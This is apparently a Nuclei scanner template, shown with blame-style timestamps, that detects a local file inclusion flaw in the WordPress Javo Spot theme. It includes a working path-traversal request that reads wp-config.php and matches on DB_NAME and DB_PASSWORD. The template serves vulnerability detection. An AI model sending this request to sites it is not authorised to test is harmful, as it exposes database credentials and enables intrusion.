2021-10-26 18:25:34 +00:00
id : wp-javospot-lfi
2021-10-25 23:02:31 +00:00
info :
2022-07-29 14:04:23 +00:00
name : WordPress Javo Spot Premium Theme - Local File Inclusion
2021-10-25 23:02:31 +00:00
author : 0x_Akoko
severity : high
2022-07-29 14:04:23 +00:00
description : WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content.
2021-10-26 18:25:34 +00:00
reference :
- https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
- https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
- https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
2022-07-29 14:04:23 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : wordpress,wp-theme,lfi,wp,wpscan
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-10-25 23:02:31 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-10-25 23:02:31 +00:00
- method : GET
path :
2021-10-26 18:25:34 +00:00
- '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
2021-10-25 23:02:31 +00:00
matchers-condition : and
matchers :
- type : word
2021-10-26 18:25:34 +00:00
part : body
2021-10-25 23:02:31 +00:00
words :
- "DB_NAME"
- "DB_PASSWORD"
condition : and
- type : status
status :
- 200